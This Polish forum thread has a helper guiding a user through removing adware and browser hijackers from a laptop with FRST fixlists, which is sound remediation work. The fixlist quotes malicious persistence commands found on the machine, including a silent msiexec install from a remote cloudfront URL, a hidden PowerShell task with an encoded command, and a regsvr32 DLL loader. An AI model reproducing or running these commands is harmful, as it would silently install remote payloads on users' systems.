Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

zainfekowane przeglądarki w laptopie

amigo10 19 Kwi 2017 18:41 822 6
  • #1 19 Kwi 2017 18:41
    amigo10
    Poziom 11  

    Podczas zapisywania nowej wersji Kodi wszedł wirus przekazujący strony oraz doinstalujący Firefoxa i Chrome. Mam tylko Systemowe EDGE i IE a "obce" udało się ręcznie usunąć. Avast i Malvare Hunter coś tam znalazły i usunęły lub do kwarantanny ale z blokowaniem wyskakujących tylu stron nie można pracować. Przesyłam zip z logiem z FRST i proszę o pomoc.

    0 6
  • CControls
  • #2 19 Kwi 2017 18:54
    Kolobos
    Spec od komputerów

    Usun to co wykryl adwcleaner.

    Zgraj zakladki z Firefox'a.

    Odinstaluj Malware Hunter 1.25.0.42

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    CreateRestorePoint:
    HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\...\ChromeHTML: -> "C:\Program Files (x86)\Dohat\Application\chrome.exe" "%1" <==== UWAGA
    Task: {03C8F1E2-C0DC-4A3D-893F-0AF453489DCF} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA
    Task: {05906474-BF48-4602-A6FE-8CC8DC95EA67} - System32\Tasks\Windows-PG => powershell.exe C:\windows\Update\psgo\psgo.ps1
    Task: {06F3DC38-8C12-465B-8C24-5CC09B9882F6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {11BA9E26-3015-4F71-82C3-0929AE8E2E1B} - System32\Tasks\{341F42A9-9431-E96E-C831-A69D5F4FD834} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\e321e2b2\d58749b9.dll" <==== UWAGA
    Task: {3176C29E-F6D7-4822-BB20-16A7DD37D1A0} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku <==== UWAGA
    Task: {3A71BAA3-BC8B-48BA-8853-BDA5E71ECA7D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    Task: {46B6C82D-47E4-4C72-84A6-A125DB71E961} - System32\Tasks\{3DAB05FE-F952-465F-B539-A7646CFA5565} => pcalua.exe -a C:\Users\Professional\Desktop\Patience.exe -d C:\Users\Professional\Desktop
    Task: {5422586F-A72E-4120-80C9-1EA1514CF88B} - System32\Tasks\Stgatainnnick => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/oc...A362_090214FC3D00NJG4MNLDX&amp;d=20170406 /q
    Task: {547F6479-3C1C-44E5-A1D2-50AE2993B4BD} - \{4A419993-7D82-4DEC-AC7E-861BBE859671} -> Brak pliku <==== UWAGA
    Task: {56EC1955-845A-4F19-88D3-2A5E3403D404} - System32\Tasks\{9A7DB107-2DD6-06AC-D63B-6A9E0FB569EF} => C:\ProgramData\{BCBF05C7-0B14-B26C-7598-ADF1941B1CA3}\BCD8CAE3-0B73-7D48-99D0-10699E37914E.exe <==== UWAGA
    Task: {583DFC87-3394-495A-8230-F0BF4A8CACC8} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: {58C87F11-F104-4CFC-800A-DD142F844C92} - System32\Tasks\Metuswotosy Module => C:\Program Files (x86)\Dapasy\xbigiy.exe [2017-04-06] (Glarysoft Ltd)
    Task: {733E5F57-15CF-4E47-AB52-3670A0E092E9} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {84567708-D01F-4289-9550-9ECD1D48B140} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA
    Task: {84E120F2-14B7-4A1E-A822-E1D0A4F66E54} - System32\Tasks\RunAtStartup => C:\Users\Professional\AppData\Roaming\Event Monitor\em.exe <==== UWAGA
    Task: {867BDE66-0338-4FF2-B004-103A2D5A75E5} - System32\Tasks\Celerch Controls => C:\Program Files (x86)\Lwuward\xfiloy.exe




    Task: {921D2E45-E97E-4E87-BEC1-B084EEA58FE3} - System32\Tasks\{0D080F47-087A-7D0E-0511-05080F0D1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgACAAOwA7ACAAOwAgACAAOwAgADsAOwAgACAAOwA7ACAAOwAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEA (dane wartości zawierają 9608 znaków więcej). <==== UWAGA
    Task: {9415D668-648F-4367-88AA-9ECACFD1BEBB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {968216E1-E9E5-4EA2-9D5E-B11D91F6BF64} - System32\Tasks\Qahesy Host => C:\Program Files (x86)\Dapasy\xgogoly.exe
    Task: {9959E33E-9126-4EA6-AAAF-9B73386054C0} - System32\Tasks\{061C6AC7-AFB1-C85D-601B-0DD8755DF154} => C:\Users\PROFES~1\AppData\Roaming\PRICEF~1\SYNHEL~1 <==== UWAGA
    Task: {9D795267-50F0-4799-88D9-1A56FE687984} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA
    Task: {C1E44BCD-A8C7-4B61-B8BF-0B1A754B25B5} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] ()
    Task: {DAA18B2B-B64E-4053-AD22-C72FD9029D5F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA
    Task: {E037C663-F65C-4E91-B000-80A628AC056F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {EF4619D1-D7B4-4FD9-969D-D8F3805A8F97} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA
    Task: {F8B83AA5-74C8-467C-8466-EE0E42A0C211} - System32\Tasks\InternetAF => ""
    Task: {FBF1B6E2-4D52-494D-9521-3AF5F583C44D} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA
    Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\WINDOWS\Tasks\{061C6AC7-AFB1-C85D-601B-0DD8755DF154}.job => C:\Users\PROFES~1\AppData\Roaming\PRICEF~1\SYNHEL~1 /Check Professional-PC\Professional  0 ß’
    Ö  <   <==== UWAGA
    ShortcutWithArgument: C:\Users\Professional\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...HitachiXHTS723225L9A362_090214FC3D00NJG4MNLDX
    ShortcutWithArgument: C:\Users\Professional\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> url,FileProtocolHandler "hxxp://www.mail.ru/cnt/20775012?gp=811035"
    ShortcutWithArgument: C:\Users\Professional\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...HitachiXHTS723225L9A362_090214FC3D00NJG4MNLDX
    2017-04-06 18:41 - 2017-04-06 18:41 - 00307200 _____ () C:\Program Files (x86)\Celerch Controls\local64spl.dll
    Hosts:
    HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\Professional\AppData\Local\Temp\DeleteOnReboot.bat [80 2017-04-19] () <===== UWAGA
    HKLM\...\Providers\s9gqtjyv: C:\Program Files (x86)\Celerch Controls\local64spl.dll [307200 2017-04-06] ()
    ShellExecuteHooks: Brak nazwy - {7AD1C0F5-07A2-40E5-8608-C6EAA0FF362F} - -> Brak pliku
    ShellExecuteHooks: Brak nazwy - {AD05C15E-1A7B-11E7-9314-64006A5CFC23} - -> Brak pliku
    ShellExecuteHooks: Brak nazwy - {FC4AC378-147C-11E7-9B36-64006A5CFC23} - -> Brak pliku
    ShellExecuteHooks: Brak nazwy - {8480E188-147D-11E7-A41F-64006A5CFC23} - -> Brak pliku
    GroupPolicy: Ograniczenia - Windows Defender <======= UWAGA
    GroupPolicy\User: Ograniczenia <======= UWAGA
    Tcpip\Parameters: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{7819ca67-557b-4e48-a326-5c308a9e2d64}: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{7819ca67-557b-4e48-a326-5c308a9e2d64}: [DhcpNameServer] 82.163.143.157
    Tcpip\..\Interfaces\{851937ed-3e2b-443d-9e90-892f02f770e1}: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{851937ed-3e2b-443d-9e90-892f02f770e1}: [DhcpNameServer] 82.163.143.157
    Tcpip\..\Interfaces\{bf29e9aa-06fa-4f43-852b-2659e9b0727a}: [NameServer] 82.163.143.157 82.163.142.159
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
    SearchScopes: HKU\S-1-5-21-1342425534-1270870966-1533166586-1000 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://search.yac.mx/web/?q={searchTerms}&type=ds&from=yac&uid=hitachixhts723225l9a362_090214fc3d00njg4mnldx&ts=1470499479
    = SearchScopes: HKU\S-1-5-21-1342425534-1270870966-1533166586-1000 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://search.yac.mx/web/?q={searchTerms}&type=ds&from=yac&uid=hitachixhts723225l9a362_090214fc3d00njg4mnldx&ts=1470499479
    BHO: Owisebeukpor -> {DD817D7D-657A-4B43-b4B3-F3B9515771A9} -> Brak pliku
    BHO-x32: Ďîčńę@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Professional\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll [2016-11-28] (Mail.Ru)
    FF ProfilePath: C:\Users\Professional\AppData\Roaming\Mozilla\Profiles\jmqjc1zy.default\Profiles\4z123uim.default [nie znaleziono]
    FF DefaultSearchEngine: Mozilla\Profiles\jmqjc1zy.default -> Поиск@Mail.Ru
    FF DefaultSearchEngine.US: Mozilla\Profiles\jmqjc1zy.default -> data:text/plain,browser.search.defaultenginename.US=cloudfront
    FF SelectedSearchEngine: Mozilla\Profiles\jmqjc1zy.default -> Поиск@Mail.Ru
    FF Homepage: Mozilla\Profiles\jmqjc1zy.default -> hxxp://mail.ru/cnt/10445?gp=818411
    FF Keyword.URL: Mozilla\Profiles\jmqjc1zy.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B4F...-685C-462C-9B4C-589045E1C08A%7D&gp=811041
    FF Extension: (sidebar) - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\Extensions\sidebarff@gmail.com [2015-11-07] [Brak podpisu cyfrowego]
    FF Extension: (Brak nazwy) - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\extensions\artur.dubovoy@gmail.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\content_blocker@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\virtual_keyboard@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\anti_banner@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\online_banking@kaspersky.com [nie znaleziono]
    FF Extension: (Brak nazwy) - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\extensions\arthurj8283@gmail.com [nie znaleziono]
    FF NewTab: Profiles\jmqjc1zy.default -> hxxp://www.initialpage123.com/?z=19d8f4c8a035...23225L9A362_090214FC3D00NJG4MNLDX&type=hp
    FF DefaultSearchEngine.US: Profiles\jmqjc1zy.default -> data:text/plain,browser.search.defaultenginename.US=cloudfront
    FF SelectedSearchEngine: Profiles\jmqjc1zy.default -> initialpage123
    FF Keyword.URL: Profiles\jmqjc1zy.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B4F...-685C-462C-9B4C-589045E1C08A%7D&gp=811041
    FF Extension: (FF Adr) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-10] [Brak podpisu cyfrowego]
    FF Extension: (Домашняя страница Mail.Ru) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\homepage@mail.ru [2016-11-28]
    FF Extension: (Поиск@Mail.Ru) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\search@mail.ru [2016-11-28]
    FF Extension: (Визуальные закладки @Mail.Ru) - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7} [2016-11-28]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\11fseov0.xml [2017-04-06]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\mailru.xml [2016-11-28]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\paycreiz.xml [2016-05-31]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\qm7ojdc0.xml [2017-04-06]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\s9gqtjyv.xml [2017-04-10]
    FF SearchPlugin: C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\searchplugins\startsearch.xml [2017-04-19]
    FF Extension: (sidebar) - C:\Users\Professional\AppData\Roaming\Firefox\Firefox\Profiles\4z123uim.default\Extensions\sidebarff@gmail.com [2015-11-07] [Brak podpisu cyfrowego]
    FF HKLM-x32\...\Firefox\Extensions: [sidebarff@gmail.com] - C:\Users\Professional\AppData\Roaming\Mozilla\Firefox\Profiles\4z123uim.default\extensions\sidebarff@gmail.com
    FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Professional\AppData\Roaming\Profiles\jmqjc1zy.default\extensions\arthurj8283@gmail.com
    FF HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Professional\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => nie znaleziono
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-1342425534-1270870966-1533166586-1000: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Professional\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-02-13]
    CHR HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-1342425534-1270870966-1533166586-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe <==== UWAGA
    C:\Program Files (x86)\Dohat\
    R2 3DM; C:\Users\Professional\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] (kitty.exe) [Brak podpisu cyfrowego]
    S2 AppleAzureSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [105472 2017-04-14] () [Brak podpisu cyfrowego]
    S2 Kitty; C:\Users\Professional\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [Brak podpisu cyfrowego]
    S2 Recover; C:\Program Files\AVAST Software\ZXYSVI\çQLNCHiTQG.exe [121344 2017-04-17] () [Brak podpisu cyfrowego]
    R2 SNARE; C:\Users\Professional\AppData\Local\SNARE\Snarer.dll [793600 2017-04-17] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    2017-04-19 11:05 - 2017-04-19 11:05 - 00000000 ____D C:\Users\Professional\AppData\Local\Dohat
    2017-04-19 11:04 - 2017-04-19 11:04 - 00000000 ____D C:\Users\Professional\AppData\Local\3DM
    2017-04-19 09:49 - 2017-04-19 09:49 - 01186999 _____ ( ) C:\Users\Professional\Downloads\JavaSetup_3143535439.exe
    2017-04-18 10:48 - 2017-04-18 10:48 - 00000000 ____D C:\ProgramData\SWCUTemp
    2017-04-17 16:10 - 2017-04-17 16:10 - 00000000 ____D C:\WINDOWS\Update
    2017-04-17 16:10 - 2017-04-17 16:10 - 00000000 ____D C:\Users\Professional\AppData\Local\Kitty
    2017-04-16 20:53 - 2017-04-16 20:53 - 00000000 ____D C:\Users\Professional\AppData\Local\Alltie
    2017-04-14 11:06 - 2017-04-14 11:06 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-14 10:58 - 2017-04-19 11:05 - 00002208 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2017-04-14 10:58 - 2017-04-19 11:05 - 00002079 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-04-14 10:58 - 2017-04-14 10:58 - 00000000 ____D C:\ProgramData\Software
    2017-04-14 10:16 - 2017-04-14 10:16 - 00023704 _____ C:\WINDOWS\System32\Tasks\{0D080F47-087A-7D0E-0511-05080F0D1179}
    2017-04-14 10:16 - 2017-04-14 10:16 - 00003986 _____ C:\WINDOWS\System32\Tasks\{9A7DB107-2DD6-06AC-D63B-6A9E0FB569EF}
    2017-04-14 10:16 - 2017-04-14 10:16 - 00003896 _____ C:\WINDOWS\System32\Tasks\{341F42A9-9431-E96E-C831-A69D5F4FD834}
    2017-04-13 13:11 - 2017-04-17 16:10 - 00000000 ____D C:\Users\Professional\AppData\Local\SNARE
    2017-04-13 13:11 - 2017-04-13 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-10 13:26 - 2017-04-19 11:05 - 00000000 ____D C:\Users\Professional\AppData\LocalLow\Mozilla
    2017-04-10 13:25 - 2017-04-10 13:25 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Firefox
    2017-04-10 13:25 - 2017-04-10 13:25 - 00000000 ____D C:\Users\Professional\AppData\Local\Firefox
    2017-04-10 13:25 - 2017-04-10 13:25 - 00000000 ____D C:\Users\Professional\AppData\Local\Antanna
    2017-04-10 13:24 - 2017-04-19 17:23 - 00000046 _____ C:\Users\Public\Documents\temp.dat
    2017-04-10 13:24 - 2017-04-19 11:15 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-10 13:24 - 2017-04-10 13:24 - 00000000 ____D C:\ProgramData\common
    2017-04-10 13:24 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-10 13:24 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-10 10:11 - 2017-04-17 17:10 - 00000000 ____D C:\Users\Professional\AppData\Local\SNARER
    2017-04-07 13:55 - 2017-04-07 13:55 - 00122880 _____ () C:\Theobald.dll
    2017-04-07 08:57 - 2017-04-19 11:04 - 00003702 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-07 08:57 - 2017-04-17 16:10 - 00003620 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-04-07 08:57 - 2017-04-17 16:10 - 00000000 ____D C:\Users\Professional\AppData\Roaming\WinSAPSvc
    2017-04-07 08:57 - 2017-04-07 08:57 - 00000000 ____D C:\Users\Professional\AppData\Roaming\SNARER
    2017-04-07 08:57 - 2017-04-07 08:57 - 00000000 ____D C:\Users\Professional\AppData\Local\AMD
    2017-04-07 08:57 - 2017-04-07 08:57 - 00000000 ____D C:\Update
    2017-04-07 08:53 - 2017-04-19 11:04 - 00000000 ____D C:\Program Files\MK
    2017-04-06 21:00 - 2017-04-06 21:00 - 00000000 ____D C:\ProgramData\ByteFence
    2017-04-06 20:30 - 2017-04-07 08:57 - 00000000 ____D C:\Program Files\ByteFence
    2017-04-06 19:37 - 2017-04-06 19:37 - 00000000 ___HD C:\$AV_ASW
    2017-04-06 19:27 - 2017-04-10 13:58 - 00000000 ____D C:\Users\Professional\AppData\Local\Predck
    2017-04-06 19:05 - 2017-04-06 19:47 - 00000000 ____D C:\Users\Professional\AppData\Roaming\24341904
    2017-04-06 19:05 - 2017-04-06 19:05 - 00000000 ____D C:\Program Files (x86)\Dapasy
    2017-04-06 18:57 - 2017-04-07 08:48 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Ghivaent
    2017-04-06 18:57 - 2017-04-06 18:57 - 00006084 _____ C:\WINDOWS\System32\Tasks\Metuswotosy Module
    2017-04-06 18:57 - 2017-04-06 18:57 - 00000000 ____D C:\Program Files (x86)\Metuswotosy Module
    2017-04-06 18:43 - 2017-04-06 19:47 - 00000000 ____D C:\Users\Professional\AppData\Roaming\44741880
    2017-04-06 18:43 - 2017-04-06 19:32 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Rasers
    2017-04-06 18:43 - 2017-04-06 19:27 - 00140288 _____ C:\Users\Professional\AppData\Roaming\Installer.dat
    2017-04-06 18:43 - 2017-04-06 19:27 - 00011568 _____ C:\Users\Professional\AppData\Roaming\InstallationConfiguration.xml
    2017-04-06 18:43 - 2017-04-06 18:43 - 00006032 _____ C:\WINDOWS\System32\Tasks\Qahesy Host
    2017-04-06 18:43 - 2017-04-06 18:43 - 00000000 ____D C:\Users\Professional\AppData\Local\Neduge
    2017-04-06 18:43 - 2017-04-06 18:43 - 00000000 ____D C:\Program Files (x86)\Qahesy Host
    2017-04-06 18:41 - 2017-04-06 19:32 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Praepyplontion
    2017-04-06 18:41 - 2017-04-06 18:41 - 00006104 _____ C:\WINDOWS\System32\Tasks\Celerch Controls
    2017-04-06 18:41 - 2017-04-06 18:41 - 00005160 _____ C:\WINDOWS\System32\Tasks\Stgatainnnick
    2017-04-06 18:41 - 2017-04-06 18:41 - 00000000 ____D C:\Users\Professional\AppData\Local\Biwspcajet
    2017-04-06 18:41 - 2017-04-06 18:41 - 00000000 ____D C:\Program Files (x86)\Celerch Controls
    2017-04-06 18:40 - 2017-04-06 19:37 - 00000000 ____D C:\Users\Professional\AppData\Roaming\Event Monitor
    2017-04-06 18:40 - 2017-04-06 19:32 - 00000000 ____D C:\Program Files (x86)\pccleanplus
    2017-04-06 18:40 - 2017-04-06 19:01 - 00003120 _____ C:\WINDOWS\System32\Tasks\RunAtStartup
    2017-04-19 18:04 - 2015-02-03 18:41 - 00000000 ____D C:\AdwCleaner
    2017-04-06 18:43 - 2017-04-06 19:27 - 0011568 _____ () C:\Users\Professional\AppData\Roaming\InstallationConfiguration.xml
    2017-04-06 18:43 - 2017-04-06 19:27 - 0140288 _____ () C:\Users\Professional\AppData\Roaming\Installer.dat
    Pliki do przeniesienia lub usunięcia:
    EmptyTemp:


    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    Po wykonaniu wszystkiego zamiesc nowe logi z FRST, ze skanowania.

    0
  • CControls
  • #4 19 Kwi 2017 20:55
    Kolobos
    Spec od komputerów

    Nie wykonales:
    > Po wykonaniu wszystkiego zamiesc nowe logi z FRST, ze skanowania.

    0
  • #6 20 Kwi 2017 08:44
    Kolobos
    Spec od komputerów

    Usun recznie skrot z cyrylica w nazwie:
    C:\Users\Professional\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk
    i utworz nowy poprawny o ile jest Ci potrzebny.

    Nowy Fixlist.txt dla FRST:
    2017-04-19 22:45 - 2017-04-19 22:45 - 00000000 ____D C:\Users\Professional\Downloads\FRST-OlderVersion
    2017-04-19 20:04 - 2017-04-19 20:04 - 00000000 ____D C:\AdwCleaner
    2017-04-19 20:01 - 2017-04-19 20:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-19 19:59 - 2017-04-19 19:59 - 00000000 ____D C:\ProgramData\SWCUTemp
    C:\Users\Professional\IP_Log_Data.js
    C:\Users\Professional\Network_Meter_Data.js

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #7 29 Kwi 2017 13:05
    amigo10
    Poziom 11  

    Ogromne dzięki za pomoc.
    Zamykam temat.

    0